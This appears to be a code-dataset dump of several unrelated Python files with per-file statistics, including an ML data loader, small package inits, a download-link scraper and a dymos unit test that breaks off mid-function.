batch_size = min(self.batch_size, self.train_count - self.train_idx)
out = np.array(self.data['train'][self.shuffled_idx[self.train_idx:(self.train_idx+batch_size)], :, :, :, :, :])
out_rewards = self.rewards['train'][self.shuffled_idx[self.train_idx:(self.train_idx+batch_size)], :, :]
if self.debug:
assert((batch_size == self.batch_size) or (self.train_idx + batch_size == self.train_count))
assert(out.shape == (batch_size, self.N, self.M, self.C, self.H, self.W))
assert(out_rewards.shape == (batch_size, self.N, self.M))
if self.train_idx + batch_size == self.train_count:
depleted = True
self.train_idx = 0
else:
depleted = False
self.train_idx = self.train_idx + batch_size
return out, out_rewards, depleted
def next_batch_val(self):
"""
Returns the next validation batch
out: BxNxMxCx32x32
out_rewards: BxNxM
"""
batch_size = min(self.batch_size, self.val_count - self.val_idx)
out = self.data['val'][self.val_idx:(self.val_idx+batch_size), :, :, :, :, :]
out_rewards = self.rewards['val'][self.val_idx:(self.val_idx+batch_size), :, :]
if self.debug:
assert((batch_size == self.batch_size) or (self.val_idx + batch_size == self.val_count))
assert(out.shape == (batch_size, self.N, self.M, self.C, self.H, self.W))
assert(out_rewards.shape == (batch_size, self.N, self.M))
if self.val_idx + batch_size == self.val_count:
depleted = True
self.val_idx = 0
else:
depleted = False
self.val_idx = self.val_idx + batch_size
return out, out_rewards, depleted
class DataLoaderExpertPolicy(DataLoaderSimple):
"""
DataLoader class for abstracting the reading, batching and shuffling operations
Uses expert trajectories.
"""
def __init__(self, opts):
"""
Loads the dataset, utility maps and saves settings needed:
(1) dataset statistics (2) shuffle (3) debug statistics (4) iteration tracker
Opts required: seed, h5_path, shuffle, batch_size, utility_h5_path, h5_path_unseen, debug
"""
# ---- Load the dataset, save the settings ----
super(DataLoaderExpertPolicy, self).__init__(opts)
self.trajectories_type = opts.trajectories_type
if opts.trajectories_type == 'utility_maps':
# ---- Load the utility maps ----
utility_file = h5py.File(opts.utility_h5_path)
self.utility_maps = {}
# These are KxNxMxNxM arrays
for split in utility_file.keys():
self.utility_maps[split] = np.array(utility_file[split]['utility_maps'])
elif opts.trajectories_type == 'expert_trajectories':
# ---- Load the trajectories ----
# {'train': #train_samples x T-1 numpy array, 'val': #val_samples x T-1 numpy array}
self.trajectories = torch.load(opts.utility_h5_path)
else:
raise ValueError('Wrong trajectories_type!')
def next_batch_train(self):
"""
Returns the next training batch (indexed by self.shuffled_idx and starting at self.train_idx)
out: BxNxMxCx32x32
out_maps: BxNxMxNxM
"""
batch_size = min(self.batch_size, self.train_count - self.train_idx)
out = np.array(self.data['train'][self.shuffled_idx[self.train_idx:(self.train_idx+batch_size)], :, :, :, :, :])
if self.trajectories_type == 'utility_maps':
out_maps = self.utility_maps['train'][self.shuffled_idx[self.train_idx:(self.train_idx+batch_size)]]
else:
out_maps = {}
for i in range(self.N):
for j in range(self.M):
out_maps[(i, j)] = self.trajectories['train'][(i, j)][self.shuffled_idx[self.train_idx:(self.train_idx+batch_size)], :]
if self.debug:
assert((batch_size == self.batch_size) or (self.train_idx + batch_size == self.train_count))
assert(out.shape == (batch_size, self.N, self.M, self.C, self.H, self.W))
if self.trajectories_type == 'utility_maps':
assert(out_maps.shape == (batch_size, self.N, self.M, self.N, self.M))
else:
assert(len(out_maps.keys()) == self.M * self.N)
assert(out_maps[(0, 0)].shape[0] == batch_size)
if self.train_idx + batch_size == self.train_count:
depleted = True
self.train_idx = 0
else:
depleted = False
self.train_idx = self.train_idx + batch_size
return out, out_maps, depleted
def next_batch_val(self):
"""
Returns the next validation batch
out: BxNxMxCx32x32
out_maps: BxNxMxNxM
"""
batch_size = min(self.batch_size, self.val_count - self.val_idx)
out = self.data['val'][self.val_idx:(self.val_idx+batch_size), :, :, :, :, :]
if self.trajectories_type == 'utility_maps':
out_maps = self.utility_maps['val'][self.val_idx:(self.val_idx+batch_size)]
else:
out_maps = {}
for i in range(self.N):
for j in range(self.M):
out_maps[(i, j)] = self.trajectories['val'][(i, j)][self.val_idx:(self.val_idx+batch_size), :]
if self.debug:
assert((batch_size == self.batch_size) or (self.val_idx + batch_size == self.val_count))
assert(out.shape == (batch_size, self.N, self.M, self.C, self.H, self.W))
if self.trajectories_type == 'utility_maps':
assert(out_maps.shape == (batch_size, self.N, self.M, self.N, self.M))
else:
assert(len(out_maps.keys()) == self.M * self.N)
assert(out_maps[(0, 0)].shape[0] == batch_size)
if self.val_idx + batch_size == self.val_count:
depleted = True
self.val_idx = 0
else:
depleted = False
self.val_idx = self.val_idx + batch_size
return out, out_maps, depleted
def next_batch_test(self, highres=False):
"""
Returns the next testing batch
out: BxNxMxCx32x32
out_masks: ???
out_maps: BxNxMxNxM
out_highres: BxNxMxCx448x448 (optional)
depleted: is the epoch over?
"""
batch_size = min(self.batch_size, self.test_count - self.test_idx)
out = np.array(self.data['test'][self.test_idx:(self.test_idx+batch_size), :, :, :, :, :])
if highres:
out_highres = np.array(self.data['test_highres'][self.test_idx:(self.test_idx+batch_size), :, :, :, :, :])
if self.hasmasks:
out_masks = self.masks['test'][self.test_idx:(self.test_idx+batch_size), :, :, :, :, :]
else:
out_masks = None
if self.trajectories_type == 'utility_maps':
out_maps = self.utility_maps['test'][self.test_idx:(self.test_idx+batch_size)]
else:
out_maps = {}
for i in range(self.N):
for j in range(self.M):
out_maps[(i, j)] = self.trajectories['test'][(i, j)][self.test_idx:(self.test_idx+batch_size), :]
if self.debug:
assert((batch_size == self.batch_size) or (self.test_idx + batch_size == self.test_count))
assert(out.shape == (batch_size, self.N, self.M, self.C, self.H, self.W))
if highres:
assert(out_highres.shape == (batch_size, self.N, self.M, self.C, self.H_highres, self.W_highres))
if self.hasmasks:
assert(out_masks.shape == (batch_size, self.N, self.M, self.C, self.H, self.W))
if self.trajectories_type == 'utility_maps':
assert(out_maps.shape == (batch_size, self.N, self.M, self.N, self.M))
else:
assert(len(out_maps.keys()) == self.M * self.N)
assert(out_maps[(0, 0)].shape[0] == batch_size)
if self.test_idx + batch_size == self.test_count:
depleted = True
self.test_idx = 0
else:
depleted = False
self.test_idx = self.test_idx + batch_size
if not highres:
return out, out_masks, out_maps, depleted
else:
return out, out_highres, out_masks, out_maps, depleted
def next_batch_test_unseen(self):
"""
Returns the next unseen classes testing batch
out: BxNxMxCx32x32
out_maps: BxNxMxNxM
out_masks: ???
depleted: is the epoch over?
"""
batch_size = min(self.batch_size, self.test_unseen_count - self.test_unseen_idx)
out = np.array(self.data['test_unseen'][self.test_unseen_idx:(self.test_unseen_idx+batch_size), :, :, :, :, :])
if self.hasmasks:
out_masks = self.masks['test_unseen'][self.test_unseen_idx:(self.test_unseen_idx+batch_size), :, :, :, :, :]
else:
out_masks = None
if self.trajectories_type == 'utility_maps':
out_maps = self.utility_maps['test_unseen'][self.test_unseen_idx:(self.test_unseen_idx + batch_size)]
else:
out_maps = {}
for i in range(self.N):
for j in range(self.M):
out_maps[(i, j)] = self.trajectories['test_unseen'][self.test_unseen_idx:(self.test_unseen_idx+batch_size), :]
if self.debug:
assert((batch_size == self.batch_size) or (self.test_unseen_idx + batch_size == self.test_unseen_count))
assert(out.shape == (batch_size, self.N, self.M, self.C, self.H, self.W))
if self.trajectories_type == 'utility_maps':
assert(out_maps.shape == (batch_size, self.N, self.M, self.N, self.M))
else:
assert(len(out_maps.keys()) == self.M * self.N)
assert(out_maps[(0, 0)].shape[0] == batch_size)
if self.test_unseen_idx + batch_size == self.test_unseen_count:
depleted = True
self.test_unseen_idx = 0
else:
depleted = False
self.test_unseen_idx = self.test_unseen_idx + batch_size
return out, out_masks, out_maps, depleted
class DataLoaderExpertBoth(DataLoaderSimple):
# TODO: Need to update trajectories_type here
# TODO: Add next_batch_test with expert trajectories option here
"""
DataLoader class for abstracting the reading, batching and shuffling operations
Uses expert trajectories and rewards.
"""
def __init__(self, opts):
"""
Loads the dataset, utility maps and saves settings needed:
(1) dataset statistics (2) shuffle (3) debug statistics (4) iteration tracker
Opts required: seed, h5_path, shuffle, batch_size, utility_h5_path, rewards_h5_path, h5_path_unseen, debug
"""
# ---- Load the dataset, save the settings ----
super(DataLoaderExpertBoth, self).__init__(opts)
# ---- Load the utility maps and rewards ----
utility_file = h5py.File(opts.utility_h5_path)
rewards_file = h5py.File(opts.rewards_h5_path)
self.rewards = {}
self.utility_maps = {}
# These are KxNxMxNxM arrays
self.utility_maps['train'] = np.array(utility_file['train/utility_maps'])
self.utility_maps['val'] = np.array(utility_file['val/utility_maps'])
# These are KxNxM arrays containing rewards corresponding to each views of
# all panoramas in the train and val splits
self.rewards['train'] = np.array(rewards_file['train/nms'])
self.rewards['val'] = np.array(rewards_file['val/nms'])
def next_batch_train(self):
"""
Returns the next training batch (indexed by self.shuffled_idx and starting at self.train_idx)
out: BxNxMxCx32x32
out_maps: BxNxMxNxM
out_rewards: BxNxM
"""
batch_size = min(self.batch_size, self.train_count - self.train_idx)
out = np.array(self.data['train'][self.shuffled_idx[self.train_idx:(self.train_idx+batch_size)], :, :, :, :, :])
out_maps = self.utility_maps['train'][self.shuffled_idx[self.train_idx:(self.train_idx+batch_size)]]
out_rewards = self.rewards['train'][self.shuffled_idx[self.train_idx:(self.train_idx+batch_size)], :, :]
if self.debug:
assert((batch_size == self.batch_size) or (self.train_idx + batch_size == self.train_count))
assert(out.shape == (batch_size, self.N, self.M, self.C, self.H, self.W))
assert(out_maps.shape == (batch_size, self.N, self.M, self.N, self.M))
assert(out_rewards.shape == (batch_size, self.N, self.M))
if self.train_idx + batch_size == self.train_count:
depleted = True
self.train_idx = 0
else:
depleted = False
self.train_idx = self.train_idx + batch_size
return out, out_maps, out_rewards, depleted
def next_batch_val(self):
"""
Returns the next validation batch
out: BxNxMxCx32x32
out_maps: BxNxMxNxM
out_rewards: BxNxM
"""
batch_size = min(self.batch_size, self.val_count - self.val_idx)
out = self.data['val'][self.val_idx:(self.val_idx+batch_size), :, :, :, :, :]
out_maps = self.utility_maps['val'][self.val_idx:(self.val_idx+batch_size)]
out_rewards = self.rewards['val'][self.val_idx:(self.val_idx+batch_size)]
if self.debug:
assert((batch_size == self.batch_size) or (self.val_idx + batch_size == self.val_count))
assert(out.shape == (batch_size, self.N, self.M, self.C, self.H, self.W))
assert(out_maps.shape == (batch_size, self.N, self.M, self.N, self.M))
assert(out_rewards.shape == (batch_size, self.N, self.M))
if self.val_idx + batch_size == self.val_count:
depleted = True
self.val_idx = 0
else:
depleted = False
self.val_idx = self.val_idx + batch_size
return out, out_maps, out_rewards, depleted
| 43.340782
| 139
| 0.593409
| 3,035
| 23,274
| 4.327842
| 0.0514
| 0.10552
| 0.074229
| 0.025124
| 0.859307
| 0.836924
| 0.815836
| 0.806395
| 0.790027
| 0.778759
| 0
| 0.010108
| 0.281602
| 23,274
| 536
| 140
| 43.421642
| 0.775478
| 0.158976
| 0
| 0.791176
| 0
| 0
| 0.036747
| 0
| 0
| 0
| 0
| 0.001866
| 0.138235
| 1
| 0.047059
| false
| 0
| 0.014706
| 0
| 0.117647
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0d7508a75b483f9b126cef6158bc6f3affd3618c
| 46
|
py
|
Python
|
pyqt_transparent_timer/__init__.py
|
yjg30737/pyqt-transparent-timer
|
6919a92517db62832e1048b1d1afc3f1b8449c11
|
[
"MIT"
] | null | null | null |
pyqt_transparent_timer/__init__.py
|
yjg30737/pyqt-transparent-timer
|
6919a92517db62832e1048b1d1afc3f1b8449c11
|
[
"MIT"
] | null | null | null |
pyqt_transparent_timer/__init__.py
|
yjg30737/pyqt-transparent-timer
|
6919a92517db62832e1048b1d1afc3f1b8449c11
|
[
"MIT"
] | null | null | null |
from .transparentTimer import TransparentTimer
| 46
| 46
| 0.913043
| 4
| 46
| 10.5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.065217
| 46
| 1
| 46
| 46
| 0.976744
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0d7e49707275d39130f26dad1713cd2fe9540cfa
| 1,273
|
py
|
Python
|
streamr/protocol/util/meta.py
|
streamr-dev/streamr-client-python
|
8160df6d58cc124369bc47cf56245c7d17bf662f
|
[
"Apache-2.0"
] | 8
|
2019-06-13T04:02:55.000Z
|
2022-02-10T04:33:49.000Z
|
streamr/protocol/util/meta.py
|
streamr-dev/streamr-client-python
|
8160df6d58cc124369bc47cf56245c7d17bf662f
|
[
"Apache-2.0"
] | 3
|
2019-01-17T22:59:01.000Z
|
2021-11-06T16:49:14.000Z
|
streamr/protocol/util/meta.py
|
streamr-dev/streamr-client-python
|
8160df6d58cc124369bc47cf56245c7d17bf662f
|
[
"Apache-2.0"
] | 4
|
2019-01-27T14:02:07.000Z
|
2021-11-02T15:08:31.000Z
|
"""
Metaclass of Response and Request
"""
class ResponseMeta(type):
"""
Meta class of Response
"""
response_class_by_response_type = {}
@classmethod
def register(mcs, clazz, typez):
"""
register son class to response_class_by_response_type
:param clazz: son class
:param typez: son class type
:return: None
"""
mcs.response_class_by_response_type[typez] = clazz
def __new__(mcs, name, base, attrs):
clazz = super().__new__(mcs, name, base, attrs)
if name not in ['Response', 'ResendResponse']:
mcs.register(clazz, attrs['TYPE'])
return clazz
class RequestMeta(type):
"""
Meta class of Request
"""
response_class_by_response_type = {}
@classmethod
def register(mcs, clazz, typez):
"""
register son class to response_class_by_response_type
:param clazz: son class
:param typez: son class type
:return: None
"""
mcs.response_class_by_response_type[typez] = clazz
def __new__(mcs, name, base, attrs):
clazz = super().__new__(mcs, name, base, attrs)
if name not in ['Request']:
mcs.register(clazz, attrs['TYPE'])
return clazz
| 23.574074
| 61
| 0.601728
| 148
| 1,273
| 4.905405
| 0.209459
| 0.107438
| 0.123967
| 0.190083
| 0.812672
| 0.812672
| 0.812672
| 0.713499
| 0.713499
| 0.713499
| 0
| 0
| 0.293794
| 1,273
| 53
| 62
| 24.018868
| 0.807564
| 0.251375
| 0
| 0.8
| 0
| 0
| 0.045067
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0d987b6c1952a95f579b63d2251b43ce982fb6cb
| 151
|
py
|
Python
|
cloudberry-py/cloudberry/api/model/series/__init__.py
|
olliekrk/cloud-berry
|
8b39fb0b4f8772348fb50c0c1d0200c96df03cbe
|
[
"MIT"
] | null | null | null |
cloudberry-py/cloudberry/api/model/series/__init__.py
|
olliekrk/cloud-berry
|
8b39fb0b4f8772348fb50c0c1d0200c96df03cbe
|
[
"MIT"
] | null | null | null |
cloudberry-py/cloudberry/api/model/series/__init__.py
|
olliekrk/cloud-berry
|
8b39fb0b4f8772348fb50c0c1d0200c96df03cbe
|
[
"MIT"
] | null | null | null |
from .data_point import DataPoint
from .data_series import DataSeries
from .data_series import SeriesInfo
from .data_series_pack import DataSeriesPack
| 30.2
| 44
| 0.86755
| 21
| 151
| 6
| 0.47619
| 0.253968
| 0.333333
| 0.31746
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.10596
| 151
| 4
| 45
| 37.75
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
0da88be3b70b97bcdc7c4063084fa03f948b836b
| 222
|
py
|
Python
|
capacity/operators.py
|
JuanBalceda/python-basics
|
65649f1b5619efb1a4bb56abc904f848eb42a986
|
[
"MIT"
] | null | null | null |
capacity/operators.py
|
JuanBalceda/python-basics
|
65649f1b5619efb1a4bb56abc904f848eb42a986
|
[
"MIT"
] | null | null | null |
capacity/operators.py
|
JuanBalceda/python-basics
|
65649f1b5619efb1a4bb56abc904f848eb42a986
|
[
"MIT"
] | null | null | null |
print(divmod(100, 7))
print(7 > 2 and 1 > 6)
print(7 > 2 or 1 > 6)
number_list = [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16]
print(number_list[2:8])
print(number_list[0:9:3])
print(number_list[0:10:3])
| 22.2
| 67
| 0.576577
| 50
| 222
| 2.48
| 0.48
| 0.322581
| 0.362903
| 0.258065
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.245714
| 0.211712
| 222
| 9
| 68
| 24.666667
| 0.462857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.857143
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
0dce0803053ef5c46622087ad9b526e24eeeee1a
| 1,592
|
py
|
Python
|
Video Downloader/run.py
|
legitshivam/PET
|
7d90aac36eadf6255cc4004f72e147987221826a
|
[
"MIT"
] | 1
|
2021-11-07T06:19:36.000Z
|
2021-11-07T06:19:36.000Z
|
Video Downloader/run.py
|
legitshivam/PET
|
7d90aac36eadf6255cc4004f72e147987221826a
|
[
"MIT"
] | null | null | null |
Video Downloader/run.py
|
legitshivam/PET
|
7d90aac36eadf6255cc4004f72e147987221826a
|
[
"MIT"
] | null | null | null |
from scrapper.cartoonsarea import download_link_generator, all_download_link_generator
if __name__ == '__main__':
url_list = ['https://eng.cartoonsarea.xyz/English-Dubbed-Series/O-Dubbed-Series/One-Piece-Dubbed-Videos/One-Piece-Season-15-Dubbed-Videos/',
'https://eng.cartoonsarea.xyz/English-Dubbed-Series/O-Dubbed-Series/One-Piece-Dubbed-Videos/One-Piece-Season-15-Dubbed-Videos/?page=2',
'https://eng.cartoonsarea.xyz/English-Dubbed-Series/O-Dubbed-Series/One-Piece-Dubbed-Videos/One-Piece-Season-15-Dubbed-Videos/?page=3',
'https://eng.cartoonsarea.xyz/English-Dubbed-Series/O-Dubbed-Series/One-Piece-Dubbed-Videos/One-Piece-Season-16-Dubbed-Videos/',
'https://eng.cartoonsarea.xyz/English-Dubbed-Series/O-Dubbed-Series/One-Piece-Dubbed-Videos/One-Piece-Season-16-Dubbed-Videos/?page=2',
'https://eng.cartoonsarea.xyz/English-Dubbed-Series/O-Dubbed-Series/One-Piece-Dubbed-Videos/One-Piece-Season-17-Dubbed-Videos/',
'https://eng.cartoonsarea.xyz/English-Dubbed-Series/O-Dubbed-Series/One-Piece-Dubbed-Videos/One-Piece-Season-17-Dubbed-Videos/?page=2',
'https://eng.cartoonsarea.xyz/English-Dubbed-Series/O-Dubbed-Series/One-Piece-Dubbed-Videos/One-Piece-Season-17-Dubbed-Videos/?page=3',
'https://eng.cartoonsarea.xyz/English-Dubbed-Series/O-Dubbed-Series/One-Piece-Dubbed-Videos/One-Piece-Season-17-Dubbed-Videos/?page=4']
for url in url_list:
links = all_download_link_generator(url)
wait = input('\nNext-->')
exit()
| 66.333333
| 151
| 0.711055
| 223
| 1,592
| 4.995516
| 0.170404
| 0.193896
| 0.16158
| 0.185817
| 0.858169
| 0.858169
| 0.858169
| 0.858169
| 0.858169
| 0.858169
| 0
| 0.017229
| 0.125
| 1,592
| 23
| 152
| 69.217391
| 0.782484
| 0
| 0
| 0
| 0
| 0.6
| 0.746062
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.066667
| 0
| 0.066667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
0dfa4a7a1da5fa8586668c71b8a50e91252c069c
| 225
|
py
|
Python
|
rpmvenv/extensions/python/__init__.py
|
oleynikandrey/rpmvenv
|
694c32b2d240285bbae9eee590a39dcb34ef1e2c
|
[
"MIT"
] | 150
|
2015-03-11T15:38:36.000Z
|
2022-02-16T10:00:47.000Z
|
rpmvenv/extensions/python/__init__.py
|
oleynikandrey/rpmvenv
|
694c32b2d240285bbae9eee590a39dcb34ef1e2c
|
[
"MIT"
] | 70
|
2015-03-11T15:40:59.000Z
|
2022-01-15T15:48:16.000Z
|
rpmvenv/extensions/python/__init__.py
|
oleynikandrey/rpmvenv
|
694c32b2d240285bbae9eee590a39dcb34ef1e2c
|
[
"MIT"
] | 44
|
2015-03-22T22:26:15.000Z
|
2021-12-05T19:56:05.000Z
|
"""Core feature extensions for the project related to Python packaging."""
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
| 32.142857
| 74
| 0.848889
| 29
| 225
| 5.931034
| 0.655172
| 0.232558
| 0.372093
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12
| 225
| 6
| 75
| 37.5
| 0.868687
| 0.302222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.25
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
219a350a2b8e334b2e1cfc5e76aa31ca079b9079
| 15,489
|
py
|
Python
|
dymos/transcriptions/pseudospectral/components/test/test_state_interp_comp.py
|
naylor-b/dymos
|
56ee72041056ae20c3332d060e291c4da93844b1
|
[
"Apache-2.0"
] | null | null | null |
dymos/transcriptions/pseudospectral/components/test/test_state_interp_comp.py
|
naylor-b/dymos
|
56ee72041056ae20c3332d060e291c4da93844b1
|
[
"Apache-2.0"
] | null | null | null |
dymos/transcriptions/pseudospectral/components/test/test_state_interp_comp.py
|
naylor-b/dymos
|
56ee72041056ae20c3332d060e291c4da93844b1
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import print_function, division, absolute_import
import unittest
import numpy as np
from numpy.testing import assert_almost_equal
from openmdao.api import Problem, Group, IndepVarComp
from openmdao.utils.assert_utils import assert_check_partials
from dymos.transcriptions.pseudospectral.components import StateInterpComp
from dymos.transcriptions.grid_data import GridData
from dymos.utils.lgr import lgr
SHOW_PLOTS = False
if SHOW_PLOTS:
import matplotlib.pyplot as plt
# Test 1: Let x = t**2, f = 2*t
def x(t):
return t ** 2
def f_x(t):
return 2 * t
# Test 1: Let v = t**3-10*t**2, f = 3*t**2 - 20*t
def v(t):
return t ** 3 - 10 * t ** 2
def f_v(t):
return 3 * t ** 2 - 20 * t
class TestStateInterpComp(unittest.TestCase):
def test_state_interp_comp_lobatto(self):
segends = np.array([0.0, 3.0, 10.0])
gd = GridData(num_segments=2,
transcription_order=3,
segment_ends=segends,
transcription='gauss-lobatto')
p = Problem(model=Group())
states = {'x': {'units': 'm', 'shape': (1,)},
'v': {'units': 'm/s', 'shape': (1,)}}
X_ivc = IndepVarComp()
p.model.add_subsystem('X_ivc', X_ivc, promotes=['state_disc:x', 'state_disc:v'])
X_ivc.add_output('state_disc:x', val=np.zeros(gd.subset_num_nodes['state_disc']),
units='m')
X_ivc.add_output('state_disc:v', val=np.zeros(gd.subset_num_nodes['state_disc']),
units='m/s')
F_ivc = IndepVarComp()
p.model.add_subsystem('F_ivc', F_ivc, promotes=['staterate_disc:x', 'staterate_disc:v'])
F_ivc.add_output('staterate_disc:x',
val=np.zeros(gd.subset_num_nodes['state_disc']),
units='m/s')
F_ivc.add_output('staterate_disc:v',
val=np.zeros(gd.subset_num_nodes['state_disc']),
units='m/s**2')
dt_dtau_ivc = IndepVarComp()
p.model.add_subsystem('dt_dstau_ivc', dt_dtau_ivc, promotes=['dt_dstau'])
dt_dtau_ivc.add_output('dt_dstau', val=0.0*np.zeros(gd.subset_num_nodes['col']), units='s')
p.model.add_subsystem('state_interp_comp',
subsys=StateInterpComp(transcription='gauss-lobatto',
grid_data=gd,
state_options=states,
time_units='s'))
p.model.connect('state_disc:x', 'state_interp_comp.state_disc:x')
p.model.connect('state_disc:v', 'state_interp_comp.state_disc:v')
p.model.connect('staterate_disc:x', 'state_interp_comp.staterate_disc:x')
p.model.connect('staterate_disc:v', 'state_interp_comp.staterate_disc:v')
p.model.connect('dt_dstau', 'state_interp_comp.dt_dstau')
p.setup(force_alloc_complex=True)
segends_disc = segends[np.array((0, 1, 1, 2), dtype=int)]
p['state_disc:x'] = [x(t) for t in segends_disc]
p['staterate_disc:x'] = [f_x(t) for t in segends_disc]
p['state_disc:v'] = [v(t) for t in segends_disc]
p['staterate_disc:v'] = [f_v(t) for t in segends_disc]
p['dt_dstau'] = (segends[1:] - segends[:-1]) / 2.0
p.run_model()
t_disc = segends_disc
t_col = (segends[1:] + segends[:-1]) / 2.0
if SHOW_PLOTS: # pragma: no cover
f, ax = plt.subplots(2, 1)
t = np.linspace(0, 10, 100)
x1 = x(t)
xdot1 = f_x(t)
x2 = v(t)
xdot2 = f_v(t)
ax[0].plot(t, x1, 'b-', label='$x$')
ax[0].plot(t, xdot1, 'b--', label='$\dot{x}$')
ax[0].plot(t_disc, p['state_disc:x'], 'bo', label='$X_d:x$')
ax[0].plot(t_col, p['state_interp_comp.state_col:x'], 'bv', label='$X_c:x$')
ax[0].plot(t_col, p['state_interp_comp.staterate_col:x'], marker='v', color='None',
mec='b', label='$Xdot_c:x$')
ax[1].plot(t, x2, 'r-', label='$v$')
ax[1].plot(t, xdot2, 'r--', label='$\dot{v}$')
ax[1].plot(t_disc, p['state_disc:v'], 'ro', label='$X_d:v$')
ax[1].plot(t_col, p['state_interp_comp.state_col:v'], 'rv', label='$X_c:v$')
ax[1].plot(t_col, p['state_interp_comp.staterate_col:v'], marker='v', color='None',
mec='r', label='$Xdot_c:v$')
ax[0].legend(loc='upper left', ncol=3)
ax[1].legend(loc='upper left', ncol=3)
plt.show()
# Test 1
assert_almost_equal(
p['state_interp_comp.state_col:x'][:, 0], x(t_col))
assert_almost_equal(
p['state_interp_comp.staterate_col:x'][:, 0], f_x(t_col))
# Test 2
assert_almost_equal(
p['state_interp_comp.state_col:v'][:, 0], v(t_col))
assert_almost_equal(
p['state_interp_comp.staterate_col:v'][:, 0], f_v(t_col))
cpd = p.check_partials(compact_print=True, method='cs')
assert_check_partials(cpd, atol=5.0E-5)
def test_state_interp_comp_lobatto_vectorized(self):
segends = np.array([0.0, 3.0, 10.0])
gd = GridData(num_segments=2,
transcription_order=3,
segment_ends=segends,
transcription='gauss-lobatto')
p = Problem(model=Group())
states = {'pos': {'units': 'm', 'shape': (2,)}}
X_ivc = IndepVarComp()
p.model.add_subsystem('X_ivc', X_ivc, promotes=['state_disc:pos'])
X_ivc.add_output('state_disc:pos',
val=np.zeros((gd.subset_num_nodes['state_disc'], 2)), units='m')
F_ivc = IndepVarComp()
p.model.add_subsystem('F_ivc', F_ivc, promotes=['staterate_disc:pos'])
F_ivc.add_output('staterate_disc:pos',
val=np.zeros((gd.subset_num_nodes['state_disc'], 2)),
units='m/s')
dt_dtau_ivc = IndepVarComp()
p.model.add_subsystem('dt_dstau_ivc', dt_dtau_ivc, promotes=['dt_dstau'])
dt_dtau_ivc.add_output('dt_dstau', val=0.0*np.zeros(gd.subset_num_nodes['col']), units='s')
p.model.add_subsystem('state_interp_comp',
subsys=StateInterpComp(transcription='gauss-lobatto',
grid_data=gd,
state_options=states,
time_units='s'))
p.model.connect('state_disc:pos', 'state_interp_comp.state_disc:pos')
p.model.connect('staterate_disc:pos', 'state_interp_comp.staterate_disc:pos')
p.model.connect('dt_dstau', 'state_interp_comp.dt_dstau')
p.setup(force_alloc_complex=True)
segends_disc = segends[np.array((0, 1, 1, 2), dtype=int)]
p['state_disc:pos'][:, 0] = [x(t) for t in segends_disc] # [0.0, 25.0, 25.0, 100.0]
p['staterate_disc:pos'][:, 0] = [f_x(t) for t in segends_disc]
p['state_disc:pos'][:, 1] = [v(t) for t in segends_disc]
p['staterate_disc:pos'][:, 1] = [f_v(t) for t in segends_disc]
p['dt_dstau'] = (segends[1:] - segends[:-1]) / 2.0
p.run_model()
t_disc = segends_disc
t_col = (segends[1:] + segends[:-1]) / 2.0
if SHOW_PLOTS: # pragma: no cover
f, ax = plt.subplots(2, 1)
print(t_disc)
print(t_col)
